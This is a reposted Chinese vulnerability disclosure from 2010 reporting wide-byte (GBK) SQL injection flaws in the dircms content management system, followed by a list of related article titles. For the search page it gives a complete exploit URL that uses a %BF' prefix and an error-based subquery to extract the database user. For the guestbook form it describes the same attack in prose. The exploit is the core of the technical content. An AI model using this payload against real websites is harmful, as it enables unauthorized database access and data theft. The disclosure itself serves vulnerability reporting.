dircms宽字节注入漏洞
来源:互联网 发布:威士忌用什么杯子 知乎 编辑:程序博客网 时间:2024/04/27 12:54
//------------------------------------
Name: dircms
Site: www.dircms.net
Desc: 宽字节带来的注入问题
Author: tojen (tojen.me at gmail.com)
Date: 2010/3/8
//--------------------------------------
描述:无意间黑盒发现dircms存在宽字节带来的注入问题,虽然流行过一段时间,貌似现在人们都不太关注这个问题。测试了下发现有俩个地方存在问题:
1http://demo.dircms.net/lifecms/search/index.php?type=content&catid=127&xs=&wylx=%BF
这个就不多说了
exp:
http://demo.dircms.net/lifecms/search/index.php?type=content&catid=127&xs=%BF'and%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(user(),0x3a)%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)k)%23%23
2.http://demo.dircms.net/lifecms/guestbook/index.php?action=post
这个地方类似于帝国留言本那个宽字节注入,标题和内容处可以利用宽字节带入SQL语句执行
- dircms宽字节注入漏洞
- MYSQL宽字节注入漏洞详解
- MySQL宽字节注入漏洞分析
- MySQL宽字节注入漏洞分析
- 深入探究宽字节注入漏洞与修补原理
- 深入探究宽字节注入漏洞与修补原理
- 宽字节注入
- 宽字节注入
- sql注入之宽字节注入
- (学习)SQL注入--宽字节注入
- SQL注入——宽字节注入
- sql宽字节注入详解
- 简单宽字节sqlmap注入
- sql宽字节注入详解
- 宽字节SQL注入原理
- 宽字节(宽字符)注入
- 宽字节(宽字符)注入
- 宽字节(宽字符)注入
- Dawei 团购 变量未初值化
- “代理XP”组件已作为此服务器安全配置的一部分被关闭的解决办法
- 内存管理器
- ActiveX调用dll打包成cab供客户端下载
- 理解oracle中连接和会话
- dircms宽字节注入漏洞
- JPA 缓存与应用集群
- DirectX 11 SDK文档(七)
- 你
- xen rpm包下载地址
- struts2+ibatis+Xfire配置开发
- 你们知道循光小车的电路图不
- 牧星 php 网站信息管理系统 0day
- log4net 使用